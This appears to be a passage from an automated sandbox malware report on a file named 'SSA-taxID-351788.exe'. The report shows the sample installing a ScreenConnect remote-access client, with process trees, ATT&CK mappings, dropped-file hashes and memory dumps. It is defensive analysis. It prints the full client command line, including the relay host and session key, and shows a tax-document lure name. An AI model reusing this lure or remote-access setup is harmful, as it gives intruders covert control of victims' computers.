4052	ScreenConnect.WindowsClient.exe
4052	ScreenConnect.WindowsClient.exe
4052	ScreenConnect.WindowsClient.exe
4052	ScreenConnect.WindowsClient.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 4636	1652	SSA-taxID-351788.exe	77
PID 1652 wrote to memory of 4636	1652	SSA-taxID-351788.exe	77
PID 4636 wrote to memory of 3904	4636	dfsvc.exe	78
PID 4636 wrote to memory of 3904	4636	dfsvc.exe	78
PID 4636 wrote to memory of 3904	4636	dfsvc.exe	78
PID 3904 wrote to memory of 3276	3904	ScreenConnect.WindowsClient.exe	79
PID 3904 wrote to memory of 3276	3904	ScreenConnect.WindowsClient.exe	79
PID 3904 wrote to memory of 3276	3904	ScreenConnect.WindowsClient.exe	79
PID 3772 wrote to memory of 4052	3772	ScreenConnect.ClientService.exe	81
PID 3772 wrote to memory of 4052	3772	ScreenConnect.ClientService.exe	81
PID 3772 wrote to memory of 4052	3772	ScreenConnect.ClientService.exe	81
PID 3772 wrote to memory of 2296	3772	ScreenConnect.ClientService.exe	82
PID 3772 wrote to memory of 2296	3772	ScreenConnect.ClientService.exe	82
PID 3772 wrote to memory of 2296	3772	ScreenConnect.ClientService.exe	82
PID 3772 wrote to memory of 1860	3772	ScreenConnect.ClientService.exe	84
PID 3772 wrote to memory of 1860	3772	ScreenConnect.ClientService.exe	84
PID 3772 wrote to memory of 1860	3772	ScreenConnect.ClientService.exe	84

C:\Users\Admin\AppData\Local\Temp\SSA-taxID-351788.exe
"C:\Users\Admin\AppData\Local\Temp\SSA-taxID-351788.exe"
1⤵
- Manipulates Digital Signatures
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4636
- - C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.ClientService.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-mguhbu-relay.screenconnect.com&p=443&s=56803b7a-ca34-4801-af8b-8afe3bdff8cd&k=BgIAAACkAABSU0ExAAgAAAEAAQDhx8OBj8FY8rB1VrDLChLP1LLvdBBljaauOrbEq6YeMiLKF8LA3tBnj7v%2bjnNSUoOgIYPdPVZVC89yNv4W6OHmtypYW6YajtDJo5zSReYHx%2fMVp1JeQxEyGWGVCcQaECUzy2npekQLBoCxF4skgFnbSweEO0PYHaDJL3LQ916%2fNkbdny3ByOho6jMuGHldl7DFDrdhGxxo91apGBvgTWZjjcLUCmmza2jEJqNDpgolf6%2fw6SGFOWJmoAo%2bHAL2HAr2bIEXc1TO55YYZu04meZuADpu3TP%2bZdwje%2bhzckgeVv7fnDETwzx84R41umbfOLsz1%2fBvfyca4Ps3ogcrRTS9&r=&i=Untitled%20Session" "1"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3276

C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-mguhbu-relay.screenconnect.com&p=443&s=56803b7a-ca34-4801-af8b-8afe3bdff8cd&k=BgIAAACkAABSU0ExAAgAAAEAAQDhx8OBj8FY8rB1VrDLChLP1LLvdBBljaauOrbEq6YeMiLKF8LA3tBnj7v%2bjnNSUoOgIYPdPVZVC89yNv4W6OHmtypYW6YajtDJo5zSReYHx%2fMVp1JeQxEyGWGVCcQaECUzy2npekQLBoCxF4skgFnbSweEO0PYHaDJL3LQ916%2fNkbdny3ByOho6jMuGHldl7DFDrdhGxxo91apGBvgTWZjjcLUCmmza2jEJqNDpgolf6%2fw6SGFOWJmoAo%2bHAL2HAr2bIEXc1TO55YYZu04meZuADpu3TP%2bZdwje%2bhzckgeVv7fnDETwzx84R41umbfOLsz1%2fBvfyca4Ps3ogcrRTS9&r=&i=Untitled%20Session" "1"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772
- C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe" "RunRole" "09e41274-4292-4096-a381-630aae1c9075" "User"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4052
- C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe" "RunRole" "c1e8e834-e5d2-4fe7-aac8-9a4bb1b282ef" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: AddClipboardFormatListener
  PID:2296
- C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\ScreenConnect.WindowsClient.exe" "RunRole" "624ec1b0-5605-48d4-a2c9-4d736167dd06" "System"
  2⤵
  - Executes dropped EXE
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: AddClipboardFormatListener
  PID:1860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.cdf-ms

Filesize
24KB

MD5
b4f8b314ce8467404c66884b2d42e716

SHA1
f762577d8f795a6c911dd3972bfbb328c89be3bf

SHA256
4f4d863e00269b0ec5b174df83a5128ffbbd226eb83aa406f340f02fedcc2326

SHA512
06077f36b0595033fc2ee5eb953193223602f0d82eab3b0f52100f6b0ff7c16c11ac4f54ff7dcabb28d885c85ddecb72d5b1d630e9232b98fffcca659e53f5f9

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.cdf-ms

Filesize
3KB

MD5
0a10fffeba5a882071758ffbb3ff8886

SHA1
8ad10945ab49f43c07d6462470ef093bb8a92099

SHA256
8a24242d2002dea29529ae6ba0b0dac397d1ba019e29d82c6372c555819a3a97

SHA512
c47bd5fa6e72a8166b565e56ad49ab865a102261d4141d556e0692ac6f9babc52ea1c99efc1d50d0cf7eba39774cc78f51197d2c15b065b5cba55196f9a4e4c6

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.cdf-ms

Filesize
5KB

MD5
41ab71cacb9597c8f03cde50e5a5be96

SHA1
b98a39c4254a670af848230c8f8ee47e54c734c6

SHA256
31bbbf266e9e4372ee3c9172d442b049ae992636f5a7174b6355ea366352e3b5

SHA512
bca89e6e75bddf03aba47d47242c8fe1f153205b86e3969773e3fff6259c5fb37c49bab746b2da0f37c222ba691fc825d7eb364ec44722864c5d3d8ae0eaabec

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.cdf-ms

Filesize
6KB

MD5
33334085bdae4a873242b6c3abaa0c62

SHA1
50e5f4bb5a01c173eeecba63c35c225d0392b710

SHA256
7bff3f077761bd4b5941f9287074d0f0f6093d40df2338e52cdc7fa7ea472d12

SHA512
36cacd5b2f5138cd7ae1f7242af7823daf0b569dcbb2acecb924938e843e8a0add31045c3cf60540fdbbe7874deafcfb7402d0c108fdce8160344314b81767f5

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.cdf-ms

Filesize
2KB

MD5
244a6a5be646c296a8bebc9959963251

SHA1
f9ea30005c788b11486e363e2f56680b30e1ec44

SHA256
f391f234418706011bf186d0ac19e2277be6dd4d823bce8de99678d176906d90

SHA512
0e9e8f907b91f9293006b3b47b096b1249c4b82b9778223a8908fc12f647243c0d8f4b220d2e8440c31212d02da82e329809cc009545cd3677851b69e3f20901

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.cdf-ms

Filesize
14KB

MD5
79d72da2662fa97b45217d5433d21b24

SHA1
fd7ba165e55869d5980878cb97eca47e7b740b70

SHA256
241c447764fccd7fc667a370679da8468db8c651fab6f08d1ec3433422cb894c

SHA512
5487d9774f27520273214f674ec6e2d33613bb5caff97d185cebebc0f704082bf07e10d334509c0ffda40e4827e50a66f403db4dc93b20c09960081866dc8ec9

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.cdf-ms

Filesize
4KB

MD5
b19223334980a8d31400412255c86283

SHA1
1e4693bd834fb2514ea98dab9ebda490c053b97a

SHA256
87e406239e86f4ad27f71b26feb078c0a4ca7b60d1e0a0b3a4ec500248111fa4

SHA512
552623793b759f08f164e2a95d9059b97520235065efd6d968861de0fcc4c41baec0e174ea62811e1175e17c9470b779f3d2ee7eb7024cb361f1c06726129142

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe

Filesize
93KB

MD5
dc615e9d8ec81cbf2e2452516373e5a0

SHA1
ec83d37a4f45caeb07b1605324d0315f959452e9

SHA256
e9ab064ed381c29a3930f75ca3e05605c6ee07f30a69c043f576a5461de3bafc

SHA512
82fe00447fb9785264dfb8032399adf6d33d91d71058212d252742c9e5fd54f5a52f6baf4fb05e95f9a4055057c60a33a7c1c642f18a6a4e045b49be88fa5d9f

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\Client.en-US.resources

Filesize
47KB

MD5
3e83a3aa62c5ff54ed98e27b3fbecf90

SHA1
96d8927c870a74a478864240b3ace94ad543dfb8

SHA256
2d88b97d28be01abca4544c6381a4370c1a1ce05142c176742f13b44889ddf90

SHA512
ea9d05a4aa1ee5cccc61c4f5e8994efba9efff0549b69577bef1f2a22cce908739124eff1e0db5cfdd69e077ad2d7cdb1307de92d79673c9309ee621cb139956

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\Client.resources

Filesize
26KB

MD5
5cd580b22da0c33ec6730b10a6c74932

SHA1
0b6bded7936178d80841b289769c6ff0c8eead2d

SHA256
de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

SHA512
c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\HY3JQD3E.Y6X\VDHRKP5E.68T\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\user.config

Filesize
585B

MD5
1117548d5e9ef7a99815c5548e8930bf

SHA1
34f6aaf96830566cd851caa2f6c3c0f78ef2d11d

SHA256
246cbd5de8e127aa08a977a7825f1e62c4f7623ff21ff6bfe0b9cb4f762b17ac

SHA512
4d60b6fcfa125b18feec8d1d440fc44d1787c445818b4393e6046518f270623c30ddc0c0fd529e56b526e4ed43b4c297c3c47729eb7123f876abcbecb3cd2590

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Filesize
1KB

MD5
11aed5858c042e91c8b581692542c5a9

SHA1
b06ee43f6cfd94e97da6856c96d961001b5cb488

SHA256
5d7a4f823ab9e9b53c6bc5b76a190211aa77409aa5a1d0a30ada6184ae9c8cdf

SHA512
fd9b0230b0f6205591287f42662d284f59425d16da5249286924330897b3b4c5287f9f9f5d2c5570d243e81726ad873b0be15fdea361c98c9225d77ca8395bab

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.Client.dll

Filesize
188KB

MD5
6bc9611d5b6cee698149a18d986547a8

SHA1
f36ab74e4e502fdaf81e101836b94c91d80cb8ea

SHA256
17377a52eeae11e8ee01eb629d6a60c10015ad2bb8bc9768e5c8e4b6500a15ed

SHA512
3f23670d0ba150de19a805db6beb6eed8538bbad6fbe3cc21d17d738a43cf411c679a23cea11549e69be0321e672f740791d40e92498aef9d1f8650743ee85ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.Client.dll.genman

Filesize
1KB

MD5
9ce092e164085ce2566f654314bf99dc

SHA1
acef36091ec262a4c42aa5a5b394c71b13b4767e

SHA256
6b36ddce4021fd15c29cf63c7102e60edfe2627d1b00ef97d0b4de3051737439

SHA512
95bd7f9315dc181de529d940e697b652651bc9e954e96fbc059998909259a719af062548c533d24350c25a159cb113f568eb7c622ae3069ce25fb9224ebf02a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.ClientService.dll

Filesize
60KB

MD5
22af3a23bd30484514cdacf67c5b3810

SHA1
e92a4eaee9d896964de541ce2f01c2404b638258

SHA256
7c5442121dba2a30ab9579ec08e111ded372cf9cf90fb3256f273980b975afa9

SHA512
95e40b27e90fce7ca85e76afbbc16eb62b4bb977664702b987de2eb2294e6fe9e6df5610ec7b2362c2c68493313f30fbbcbd3446dbe8ae2fa47b89407f5d5936

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.ClientService.dll.genman

Filesize
1KB

MD5
f94d041a8128be81c4347caf6a3c47bf

SHA1
3285f9acf70c0e4d34f888c28bd3f693e3df5909

SHA256
91a65bacad5f7f70bddc6209ed65dd5c375cef9f3c289eab83fd90d622adf46b

SHA512
90199543207caf9b4501be7e9509dc9526dafcd5602aaed700314763021c8f3ed06d93a31a90a34cb19d4fb7184aa7d154b197f9e535657aeb9eb872da377a41

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.Core.dll

Filesize
519KB

MD5
b319407e807be1a49e366f7f8ea7ee2a

SHA1
b12197a877fb7e33b1cb5ba11b0da5ca706581ba

SHA256
761b7e50baa229e8afcd9a50990d7f776ddb5ed1ea5fbb131c802e57cf918742

SHA512
dc497643790dc608dece9c8fe7264efedd13724bd24c9bf28a60d848b405fddefb8337a60f3f32bb91518910e02c7a2aaf29fc32f86a464dfcafa365526bdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.Core.dll.genman

Filesize
1KB

MD5
6da6dc34636435e9c2bd1b5ff79091b5

SHA1
61b6d8c16330fe9063f041bcc025c10de82d876b

SHA256
98d4edaa86468540d2d17ef17a9bcd7224b128099a51a8f92a65a88950dcb44c

SHA512
0bb929107ecfa257dfb2ff7b37955d8c2402287e989c015632a6292362858667a398ad0563103c1324a29585a8177aaa4bce3c57d867735e40d2cc5c996bd5b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.Windows.dll

Filesize
1.6MB

MD5
29454a0cb83f28c24805e9a70e53444a

SHA1
334202965b07ab69f08b16fed0ee6c7274463556

SHA256
998cc3f9af5bd41ccf0f9be86192bbe20cdec08a6ff73c1199e1364195a83e14

SHA512
62790920974a2f1b018d466ae3e3b5100006a3c8013f43bdb04af7074cfe5d992caaeb610de2b1b72ff0e4acf8762db1513a4a0cf331f9a340ae0ce53c3be895

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.Windows.dll.genman

Filesize
1KB

MD5
1fb3a39063c9fbbc9252d1224cf8c89d

SHA1
0f0622eb6205f515651e055c17d0067a94308721

SHA256
199c3f5089b07f1fb6cb343180620b2094bcdda9e1f6a3f41269c56402d98439

SHA512
8c70ff2fe2f1935454aa6bb4ce0998da1adcbfe7219f1eaee4688ee86bbc730de30347f39b9b1413cbd345d1bf786491ed2f79142d9333dba3a7f0edc9f48e3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.WindowsBackstageShell.exe

Filesize
59KB

MD5
10dba57f22a6ab4039330000570f39f8

SHA1
b8b5c65a89256177da802c4c9cbd11b013221730

SHA256
9bd8d15759f83d99edd1f2617d59a94e1c2bb4bd7c4977958f5d5f22c5a7c469

SHA512
38230b63a4630145608f619d75ca3115c05ab0338fb57566e012df1bd157123a670a37ae0fea92351ab7352319a5af29f9db3f8bb14962f3f0de3a4f5a5b754c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.WindowsClient.exe

Filesize
573KB

MD5
5dec65c4047de914c78816b8663e3602

SHA1
8807695ee8345e37efec43cbc0874277ed9b0a66

SHA256
71602f6b0b27c8b7d8ad624248e6126970939effde785ec913ace19052e9960e

SHA512
27b5dcb5b0aeadf246b91a173d06e5e8d6cf2cd19d86ca358e0a85b84cd9d8f2b26372ef34c3d427f57803d90f2e97cf59692c80c268a71865f08fc0e7ce42d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.WindowsClient.exe.config

Filesize
266B

MD5
728175e20ffbceb46760bb5e1112f38b

SHA1
2421add1f3c9c5ed9c80b339881d08ab10b340e3

SHA256
87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

SHA512
fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.WindowsClient.exe.genman

Filesize
2KB

MD5
efa59a7f55af829c3974a02f30ebe80c

SHA1
0faba6763d910d5ee104e3457045c63ccc5bf79b

SHA256
3e2d5cc7867afa23663d5894127ce6e2880d3075773a249b37576eda5088875a

SHA512
72262b09c21dc4a2b2701a5b32c149349fa3107035d5a115eac4335e3961dcf12a7a867aeff595c13aa618ea955b604538c0f4e529cb6a76fff0cb75927cc74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.WindowsClient.exe.manifest

Filesize
17KB

MD5
f4b84e283123b025a90bbde33e2080fd

SHA1
cc57bfd02228be76c6e08bde16996fa992ff0e54

SHA256
93f9eb492b6952d8c7aa1ef1ee5a901234ba1fd2d5ef58d24e1faef597ea8e02

SHA512
abc92965bf97c37a614b556d2219d06e63687777d79df5ffb4b5d447dd138c160e5a45cab76a2353d758ad62960f2e58745f0523881ff6c0ea4ccbcd7ed40002

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\DAX2EHD1.N1Y\2K33JR7G.EJ4\ScreenConnect.WindowsFileManager.exe

Filesize
79KB

MD5
c333d3a6eeb74e4d76c3b9e0f6bfd04c

SHA1
a39e2643e8dbd2097829e0b08938726557cb8e36

SHA256
998d7a0cd6b1a837489e55e99cb992088b9fde220a1025346a461849e1f50d22

SHA512
58cc7741ebe1aada93fd82a3e0a571a9a1aa3e400c46e7cdddef876d74f4fbbcbae4293ac556b3823e8dc977e7ce72337a16c2d48eab0aa52b736412ae43c634

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\R25OMXXW.JYJ\BO0GYQRC.ZBW.application

Filesize
110KB

MD5
75f072db717adf065f2d4ddd705a2d49

SHA1
8165093de1c610b4cd5b301a6237e923170618c2

SHA256
3c7dd342a48bdacb6cc05c422ae960d7baf899593c7a14a075c70f478f17825c

SHA512
ae29ecd9cd13694075681790b909edf50903aa3820cf278889574969d2d954e1001f0bd89da6d4670bc08cbf0cdfcbd2cfc6ffc27e3bd16e0a6f1fc3f73c1517

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Filesize
1KB

MD5
8adef61669398b1af8b0ef42632c24e2

SHA1
49e7467ca605496d76ff6447bed04c7a7db57fe6

SHA256
b55ffe7ed15b4a95676ccb59a38fa6ea7b0136642c39ff0ca5a4dab85fa4abda

SHA512
275324bf50f7816f12856492040ae39d8f96d15cb569d0bf5916aef5a13b8c6f61e94a658d55f43618722764a4873f4b601971faef4fd8408be1cfe32d5a2e21

Download Submit
memory/1860-443-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/1860-444-0x000000001D3F0000-0x000000001D400000-memory.dmp

Filesize
64KB

Download
memory/1860-445-0x00000000015E0000-0x00000000015F6000-memory.dmp

Filesize
88KB

Download
memory/1860-449-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/2296-424-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/2296-425-0x000000001CDA0000-0x000000001CDB0000-memory.dmp

Filesize
64KB

Download
memory/2296-429-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/3276-380-0x00000000034A0000-0x00000000034B6000-memory.dmp

Filesize
88KB

Download
memory/3276-381-0x0000000005BA0000-0x0000000005BB0000-memory.dmp

Filesize
64KB

Download
memory/3276-400-0x0000000074790000-0x0000000074F41000-memory.dmp

Filesize
7.7MB

Download
memory/3276-387-0x0000000005A70000-0x0000000005AF8000-memory.dmp

Filesize
544KB

Download
memory/3276-388-0x0000000005BA0000-0x0000000005BB0000-memory.dmp

Filesize
64KB

Download
memory/3276-384-0x0000000005BA0000-0x0000000005BB0000-memory.dmp

Filesize
64KB

Download
memory/3276-379-0x0000000074790000-0x0000000074F41000-memory.dmp

Filesize
7.7MB

Download
memory/3772-435-0x00000000042B0000-0x00000000042C0000-memory.dmp

Filesize
64KB

Download
memory/3772-402-0x00000000042B0000-0x00000000042C0000-memory.dmp

Filesize
64KB

Download
memory/3772-433-0x00000000042B0000-0x00000000042C0000-memory.dmp

Filesize
64KB

Download
memory/3772-411-0x0000000004790000-0x0000000004822000-memory.dmp

Filesize
584KB

Download
memory/3772-410-0x00000000046B0000-0x00000000046E6000-memory.dmp

Filesize
216KB

Download
memory/3772-401-0x0000000074790000-0x0000000074F41000-memory.dmp

Filesize
7.7MB

Download
memory/3772-432-0x00000000042B0000-0x00000000042C0000-memory.dmp

Filesize
64KB

Download
memory/3772-399-0x0000000004500000-0x00000000046AA000-memory.dmp

Filesize
1.7MB

Download
memory/3772-403-0x0000000004C60000-0x0000000005206000-memory.dmp

Filesize
5.6MB

Download
memory/3772-404-0x00000000042B0000-0x00000000042C0000-memory.dmp

Filesize
64KB

Download
memory/3772-431-0x0000000074790000-0x0000000074F41000-memory.dmp

Filesize
7.7MB

Download
memory/3772-407-0x00000000044A0000-0x00000000044F0000-memory.dmp

Filesize
320KB

Download
memory/3904-406-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/3904-353-0x0000000000F90000-0x0000000001024000-memory.dmp

Filesize
592KB

Download
memory/3904-354-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/3904-361-0x000000001C360000-0x000000001C370000-memory.dmp

Filesize
64KB

Download
memory/4052-436-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/4052-440-0x000000001CB50000-0x000000001CB60000-memory.dmp

Filesize
64KB

Download
memory/4052-419-0x000000001CB50000-0x000000001CB60000-memory.dmp

Filesize
64KB

Download
memory/4052-418-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/4052-420-0x0000000002710000-0x0000000002726000-memory.dmp

Filesize
88KB

Download
memory/4052-439-0x000000001CB50000-0x000000001CB60000-memory.dmp

Filesize
64KB

Download
memory/4052-438-0x000000001CB50000-0x000000001CB60000-memory.dmp

Filesize
64KB

Download
memory/4052-437-0x000000001CB50000-0x000000001CB60000-memory.dmp

Filesize
64KB

Download
memory/4052-434-0x000000001CB50000-0x000000001CB60000-memory.dmp

Filesize
64KB

Download
memory/4052-430-0x000000001CB50000-0x000000001CB60000-memory.dmp

Filesize
64KB

Download
memory/4636-51-0x000001D70EC80000-0x000001D70EC90000-memory.dmp

Filesize
64KB

Download
memory/4636-55-0x000001D72B760000-0x000001D72B7E8000-memory.dmp

Filesize
544KB

Download
memory/4636-345-0x000001D70EC80000-0x000001D70EC90000-memory.dmp

Filesize
64KB

Download
memory/4636-41-0x000001D72B770000-0x000001D72B804000-memory.dmp

Filesize
592KB

Download
memory/4636-69-0x000001D72AF40000-0x000001D72AF56000-memory.dmp

Filesize
88KB

Download
memory/4636-0-0x000001D70D0B0000-0x000001D70D0B8000-memory.dmp

Filesize
32KB

Download
memory/4636-62-0x000001D72B5D0000-0x000001D72B606000-memory.dmp

Filesize
216KB

Download
memory/4636-44-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/4636-58-0x000001D70EC80000-0x000001D70EC90000-memory.dmp

Filesize
64KB

Download
memory/4636-48-0x000001D72BA30000-0x000001D72BBDA000-memory.dmp

Filesize
1.7MB

Download
memory/4636-31-0x000001D70EC80000-0x000001D70EC90000-memory.dmp

Filesize
64KB

Download
memory/4636-7-0x000001D7293B0000-0x000001D729400000-memory.dmp

Filesize
320KB

Download
memory/4636-4-0x000001D70EC80000-0x000001D70EC90000-memory.dmp

Filesize
64KB

Download
memory/4636-3-0x000001D70EC80000-0x000001D70EC90000-memory.dmp

Filesize
64KB

Download
memory/4636-2-0x00007FF8E3A00000-0x00007FF8E44C2000-memory.dmp

Filesize
10.8MB

Download
memory/4636-1-0x000001D727790000-0x000001D727918000-memory.dmp

Filesize
1.5MB

Download